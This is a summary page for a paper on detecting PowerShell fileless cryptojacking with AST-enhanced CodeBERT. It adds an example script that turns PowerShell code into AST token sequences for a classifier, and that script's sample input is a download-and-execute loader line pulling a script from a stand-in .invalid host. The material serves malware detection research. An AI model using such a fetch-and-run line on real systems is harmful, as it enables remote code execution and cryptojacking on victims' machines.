Detecting Fileless Cryptojacking in PowerShell Using AST-Enhanced CodeBERT Models
Said Varlioglu, Nelly Elsayed, Murat Ozer, Zag ElSayed, John M. Emmert

TL;DR
This paper presents an experimental study demonstrating that AST-enhanced fine-tuned CodeBERT models effectively detect PowerShell-based fileless cryptojacking scripts, addressing a critical cybersecurity challenge.
Contribution
It introduces an AST-based fine-tuning approach for CodeBERT to improve detection of stealthy, fileless cryptojacking attacks in PowerShell scripts.
Findings
AST-based CodeBERT achieved high recall in detection
AST integration significantly improves model performance
Effective detection of stealthy PowerShell cryptojacking scripts
Abstract
With the emergence of remote code execution (RCE) vulnerabilities in ubiquitous libraries and advanced social engineering techniques, threat actors have started conducting widespread fileless cryptojacking attacks. These attacks are made effective by stealthy, PowerShell-based exploitation techniques in Windows environments. Even when an attack is detected and the malicious script removed, the processes it spawned may keep running on the victim endpoint, which poses a significant challenge for detection mechanisms. In this paper, we conducted an experimental study on a collected dataset of PowerShell-based fileless cryptojacking scripts. The results showed that an Abstract Syntax Tree (AST)-based fine-tuned CodeBERT model achieved a high recall rate, showing the value of AST integration and of fine-tuning pre-trained programming-language models for this task.
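The abstract names AST integration as the ingredient that lifts recall, but the page does not show how a PowerShell script's AST is turned into model input. The following is an added example, not code from the paper or its authors: it uses only PowerShell's built-in parser (`System.Management.Automation.Language.Parser`) to serialize a script into a node-type sequence, resolving command aliases so that `iex` and `Invoke-Expression` yield the same token. The `Get-PSAstSequence` and `ConvertTo-ModelInput` function names, the `MaxNodes` cap, the `<ast> ... </ast>` framing of the combined input, and the sample script (pointed at a non-resolvable `.invalid` host so it is inert) are all assumptions made for illustration.

```powershell
# Added example (not from the paper). Runs on Windows PowerShell 5.1 or PowerShell 7
# with no extra modules. Serializes a script's AST into a token sequence that can
# be prepended to the raw source before tokenization by a code model such as CodeBERT.

function Get-PSAstSequence {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)] [string] $Script,
        [int] $MaxNodes = 512   # assumption: cap so the sequence fits a fixed-length encoder
    )

    $tokens = $null
    $errors = $null
    $ast = [System.Management.Automation.Language.Parser]::ParseInput(
        $Script, [ref] $tokens, [ref] $errors)

    # Parse errors are kept as tokens rather than discarded: heavily obfuscated
    # loaders often break the grammar, and that is itself a signal.
    $errorTokens = foreach ($e in @($errors)) { "ParseError:$($e.ErrorId)" }

    # FindAll with an always-true predicate walks every node in traversal order,
    # including nodes inside nested script blocks (second argument = $true).
    $nodes = $ast.FindAll({ $true }, $true)

    $seq = foreach ($n in $nodes) {
        $kind = $n.GetType().Name -replace 'Ast$', ''
        if ($n -is [System.Management.Automation.Language.CommandAst]) {
            # Emit the invoked command as part of the token. GetCommandName()
            # returns $null for dynamic invocations such as "& $cmd".
            $name = $n.GetCommandName()
            if ($name) {
                # Resolve aliases on the analysis host so 'iex' and
                # 'Invoke-Expression' produce the same structural token.
                $alias = Get-Alias -Name $name -ErrorAction SilentlyContinue
                if ($alias) { $name = $alias.Definition }
                "${kind}:${name}"
            } else {
                $kind
            }
        } else {
            $kind
        }
    }

    $seq = @($errorTokens) + @($seq)
    if ($seq.Count -gt $MaxNodes) { $seq = $seq[0..($MaxNodes - 1)] }
    return $seq
}

function ConvertTo-ModelInput {
    param([Parameter(Mandatory)] [string] $Script)
    $seq = Get-PSAstSequence -Script $Script
    # Assumption: structure tokens first, then the whitespace-normalized source,
    # so a single tokenizer call sees both the AST and the raw text.
    '<ast> ' + ($seq -join ' ') + ' </ast> ' + (($Script -replace '\s+', ' ').Trim())
}

# Constructed sample (not a real payload): a download-and-evaluate pattern typical
# of fileless loaders, using the reserved .invalid TLD so it never resolves.
$sample = @'
$wc = New-Object Net.WebClient
iex $wc.DownloadString('http://example.invalid/stage.ps1')
'@

ConvertTo-ModelInput -Script $sample
```

The alias resolution depends on the aliases defined on the machine running the analysis, so run feature extraction in a fixed environment (for example a clean PowerShell session with default aliases) to keep training and inference features consistent. The node-type sequence deliberately omits string literal values; the raw source appended after `</ast>` still carries them, so the model sees both structure and content.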
Taxonomy
Topics: Security and Verification in Computing · Advanced Malware Detection Techniques · Web Application Security Vulnerabilities
